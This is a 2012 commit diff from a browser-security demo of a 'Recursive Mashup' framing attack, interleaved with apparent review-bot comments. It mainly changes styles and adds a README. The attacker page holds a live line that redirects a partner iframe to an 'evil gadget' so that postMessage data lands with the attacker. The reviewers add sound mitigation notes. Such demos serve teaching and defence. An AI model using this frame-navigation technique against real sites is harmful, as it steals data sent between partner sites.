
Modified styles, included readme

1 parent 1d125b0 commit bc2a96b481712fb3c5aac83b3d0583bab1740413 @novogeek committed Feb 20, 2012
Showing with 38 additions and 6 deletions.
  1. +11 −0 ReadMe
  2. +5 −0 attacker/gadget.html
  3. +4 −3 attacker/index.html
  4. +4 −0 partner/index.html
  5. +7 −1 postMessage/SOP.html
  6. +7 −2 postMessage/StyleSheet.css
11 ReadMe
@@ -0,0 +1,11 @@
+This demo shows how a frame phishing attack can be launched on iframes making use of "Descendent navigation policy" followed by web browsers. In this, data sent from a genuine site to its partner widget is stolen by the attacker using an evil widget.
+
+Setup: There are 3 folders-partner, postMessage and attacker. Host each of them at different origins (host them on different domains or point them to different port numbers).
+
+>>The partner site just listens to onmessage event and prints the data.
+
+>>The postMessage site contains an iframe to partner site and sends message to the partner using HTML5 postMessage API.
+
+>>The attacker site has an iframe to postMessage site. Once the postMessage site is loaded in iframe, it redirects the partner site iframe to an evil gadget. This frame navigation is possible due to the "Descendent policy" followed by web browsers. Now, if the postMessage site sends a message to partner, it is actually reached to the evil gadget!!
+
+This particular framing attack is called "Recursive Mashup attack". To prevent this attack, make sure your site uses frame busting techniques like JavaScript redirection or sending X-Frame-Options response header.
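Review bot: the mitigation paragraph names frame busting and X-Frame-Options, but neither fits the scenario the README itself describes: the partner page is meant to be framed by the postMessage site, so an X-Frame-Options header (or a JavaScript redirect out of frames) on the partner would break the legitimate mashup as well as the attack. The theft works because the message is delivered to whatever origin currently occupies the partner frame, so the direct countermeasure is on the messaging side: the postMessage site should pass the partner's exact origin as the targetOrigin argument of postMessage (never "*"), so the browser silently drops the message once the frame has been navigated elsewhere, and the partner's onmessage handler should check e.origin before printing. Suggest adding a sentence to that effect to the last paragraph. Two smaller points: the policy is spelled "Descendant navigation policy" (two occurrences), and "it is actually reached to the evil gadget" reads better as "it is actually delivered to the evil gadget". The Setup paragraph should also state the concrete origins the code expects, since attacker/index.html hard-codes http://localhost/postMessage/index.html and http://localhost:1337/gadget.html.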
5 attacker/gadget.html
@@ -2,6 +2,11 @@
<html>
<head>
<title>Attacker's Gadget-1</title>
+<style>
+body{
+background-color: #F7819F;
+}
+</style>
<script language="javascript">
window.onload = function () {
//code for stealing messages.
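Review bot: style: the `<script language="javascript">` opener in the context lines uses the obsolete `language` attribute; since this file is being touched anyway, change it to `<script type="text/javascript">` (or a bare `<script>`), matching the `type` attribute already used in partner/index.html.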
7 attacker/index.html
@@ -6,15 +6,15 @@
window.onload = function () {
var ifrAttacker = document.getElementById("ifrAttacker");
var ifrPartner = ifrAttacker.contentWindow.document.getElementById("ifrPartner");
+ //Uncomment the below code to execute Recursive mashup attack.
ifrPartner.src = "http://localhost:1337/gadget.html"
- //ifrPartner.location.href = "http://localhost:1337/gadget.html"
}
</script>
</head>
<body>
-<h3> Attacker site!</h3>
-<iframe id="ifrAttacker" width="400px" height="400px" src="http://localhost/postMessage/index.html"></iframe>
+<h3> Attacker site - Recursive Mashup Attack!</h3>
+<iframe id="ifrAttacker" width="330px" height="230px" src="http://localhost/postMessage/index.html"></iframe>
<!--
<fieldset>
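Review bot: the added comment "Uncomment the below code to execute Recursive mashup attack." is contradicted by the line below it, `ifrPartner.src = "http://localhost:1337/gadget.html"`, which is live code, so the navigation runs on every page load; either comment that line out to match, or reword the comment. The same line is also missing its terminating semicolon. More importantly, the context line `ifrAttacker.contentWindow.document.getElementById("ifrPartner")` reads the framed document's DOM, which is only permitted when the attacker page and http://localhost/postMessage/index.html share an origin; on a cross-origin host, which is what the README's setup calls for, that access throws a SecurityError before the `src` assignment is reached, so the demo as written does not exercise the descendant navigation policy the README attributes it to. Please document that constraint in the README or revise the setup so the two match.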
@@ -23,5 +23,6 @@
<iframe id="ifrGadget3" src="http://localhost:81/"></iframe>
</fieldset>
-->
+
</body>
</html>
4 partner/index.html
@@ -2,6 +2,10 @@
<html>
<head>
<title>Partner Website</title>
+<style>
+body{background-color: #CEE3F6;}
+</style>
+
<script language="javascript" type="text/javascript">
window.onload = function () {
window.onmessage = function (e) {
8 postMessage/SOP.html
@@ -27,7 +27,13 @@
<legend>Same Origin Policy Test!</legend>
<label for="txtAjaxTest">Ajax URL: </label> <input type="text" id="txtAjaxTest" value="local.html" />
<input type="button" id="btnAjaxTest" value="Ajax Test"/>
- <div id="testDiv" class="container"></div>
+ <div id="testDiv" class="container"></div>
+<div> </br></br>
+Framing http://google.com
+<iframe src="http://google.com" width="330px"></iframe></div>
+<div></br></br>
+Framing http://m.google.com
+<iframe src="http://m.google.com" width="330px"></iframe></div>
</fieldset>
</body>
</html>
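Review bot: `</br>` in the two added `<div>` lines is not a valid element; the line break is `<br>` (or `<br />` in XHTML), and the first div also has a stray space before it. The `- <div id="testDiv" ...>` / `+ <div id="testDiv" ...>` pair differs only in leading whitespace and should be dropped from the change. `width="330px"` is non-conforming on an iframe: the HTML width attribute takes a plain integer (`width="330"`), or move the sizing into StyleSheet.css. Finally, the two frames carry no explanation of the expected result; since this is the Same Origin Policy test page, add a line stating that each frame tests whether the remote site permits being framed, and that a blank or replaced frame means the site refuses framing (for example via the X-Frame-Options header the new README recommends).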
9 postMessage/StyleSheet.css
@@ -1,4 +1,8 @@
-fieldset
+body{
+ background-color:#819FF7;
+}
+
+fieldset
{
margin-top: 30px;
padding: 20px;
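Review bot: style: the new `body{` rule puts the opening brace on the selector line, while the existing `fieldset` rule in the same file puts `{` on its own line; match the file's convention so the two rules read consistently.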
@@ -11,4 +15,5 @@
margin: 10px 0px 0px 0px;
padding: 20px;
-}
+}
+
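Review bot: this hunk replaces `}` with an identical `}` and appends blank lines, so it is a whitespace or line-ending change only; drop it (or normalise line endings in a separate commit) so the diff is limited to the style and README edits the commit message describes.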

0 comments on commit bc2a96b